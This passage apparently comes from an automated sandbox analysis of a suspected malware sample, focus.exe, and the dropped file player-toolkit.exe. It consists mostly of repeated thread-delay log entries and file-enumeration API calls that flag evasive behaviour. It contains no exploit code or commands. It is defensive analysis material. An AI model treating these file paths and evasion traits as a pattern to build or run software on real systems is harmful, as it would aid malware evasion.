Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46460s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46350s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46241s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46132s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -46022s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45913s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45804s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45694s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45585s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45474s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45366s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45256s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45147s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -45038s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44928s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44819s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44710s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44491s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44382s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44272s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44163s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -44053s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43943s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43835s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43725s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43616s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43507s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43397s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43288s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43179s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -43069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42960s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42851s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42413s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42303s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42194s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -42085s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41975s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41757s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41279s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41178s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -41069s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -40960s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -40850s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -40741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -40632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -40248s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -40101s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -39991s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -39854s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -39716s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -39172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -39068s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38958s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38851s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38741s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38522s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38412s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38303s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38194s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -38084s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37975s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37866s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37756s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37647s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37428s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37319s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37210s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -37100s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -36991s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -36882s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -36772s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -36663s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 5248	Thread sleep time: -36554s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59886s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59776s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59666s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59558s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59448s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59339s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59229s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59120s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -59010s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58900s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58792s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58683s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58573s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58464s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58353s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58245s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58136s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -58026s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57917s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57807s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57698s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57588s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57479s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57370s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57261s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57151s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -57042s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56933s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56823s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56713s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56604s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56495s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56386s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56276s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56167s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -56057s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55948s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55839s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55729s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55620s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55511s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe TID: 1948	Thread sleep time: -55401s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_0040646B FindFirstFileA,FindClose,	0_2_0040646B
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\focus.exe	Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004058BF
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E56CD40 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	32_2_6E56CD40
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Code function: 32_2_6E5490FC FindFirstFileExW,	32_2_6E5490FC

Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59673	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59454	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59345	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59236	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59126	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 59017	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58907	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58798	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58689	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58579	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58470	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58360	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58251	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58142	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 58032	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57923	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57814	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57704	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57595	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57376	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57157	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 57048	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56939	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56829	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56720	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56610	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56501	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56392	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56282	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56173	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 56064	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55954	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55845	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55736	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55626	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55517	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55408	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55298	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55189	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 55079	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54970	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54751	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54642	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54532	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54423	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54204	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 54095	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53876	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53767	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53657	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53548	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53439	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53329	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53220	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 53001	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52892	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52782	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52673	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52563	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52454	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52345	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52235	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52126	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 52016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51907	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RadioBOSSAssembly\player-toolkit.exe	Thread delayed: delay time: 51798	Jump to behavior
